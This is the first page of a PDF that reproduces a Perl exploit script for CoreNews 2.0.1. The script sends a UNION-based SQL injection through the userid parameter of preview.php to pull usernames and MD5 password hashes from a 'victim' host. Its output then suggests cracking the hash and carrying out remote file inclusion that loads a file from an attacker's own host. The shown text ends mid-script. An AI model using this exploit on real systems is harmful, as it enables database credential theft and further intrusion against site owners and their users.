CoreNews 2.0.1 userid Remote SQL Injection Exploit.pdf

1 #!/usr/bin/perl 2 #Method found & Exploit scripted by nukedx 3 #Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com 4 #Original advisory: http://www.nukedx.com/?viewdoc=24 5 #Usage: corenews.pl <host> <path> 6 use IO::Socket; 7 if(@ARGV != 2) { usage(); } 8 else { exploit(); } 9 sub header() 10 { 11 print "\n− NukedX Security Advisory Nr.2006−24\r\n"; 12 print "− CoreNews <= 2.0.1 Remote SQL Injection Exploit\r\n"; 13 } 14 sub usage() 15 { 16 header(); 17 print "− Usage: $0 <host> <path>\r\n"; 18 print "− <host> −> Victim’s host ex: www.victim.com\r\n"; 19 print "− <path> −> Path to CoreNews ex: /corenews/\r\n"; 20 exit(); 21 } 22 sub exploit () 23 { 24 #Our variables... 25 $cnserver = $ARGV[0]; 26 $cnserver =~ s/(http:\/\/)//eg; 27 $cnhost = "http://".$cnserver; 28 $cndir = $ARGV[1]; 29 $cnport = "80"; 30 $cntar = "preview.php?userid="; 31 $cnxp = "−1/**/UNION/**/SELECT/**/null,concat(2022,login,20223,password,2203),null,null,null,null/**/FROM/**/corenews_users/*"; 32 $cnreq = $cnhost.$cndir.$cntar.$cnxp; 33 #Sending data... 34 header(); 35 print "− Trying to connect: $cnserver\r\n"; 36 $cn = IO::Socket::INET−>new(Proto => "tcp", PeerAddr => "$cnserver", PeerPort => "$cnport") || die "− Connection failed...\n"; 37 print $cn "GET $cnreq HTTP/1.1\n"; 38 print $cn "Accept: */*\n"; 39 print $cn "Referer: $cnhost\n"; 40 print $cn "Accept−Language: tr\n"; 41 print $cn "User−Agent: NukeZilla\n"; 42 print $cn "Cache−Control: no−cache\n"; 43 print $cn "Host: $cnserver\n"; 44 print $cn "Connection: close\n\n"; 45 print "− Connected...\r\n"; 46 while ($answer = <$cn>) { 47 if ($answer =~ /2022(.*?)20223([\d,a−f]{32})2203/) { 48 print "− Exploit succeed!\r\n"; 49 print "− Username: $1\r\n"; 50 print "− MD5 HASH of PASSWORD: $2\r\n"; 51 print "− If you crack hash you can use RFI with example −>\r\n"; 52 print "− Example: $cnhost$cndir?show=http://yourhost.com/file.txt\r\n"; Page 1/2 CoreNews 2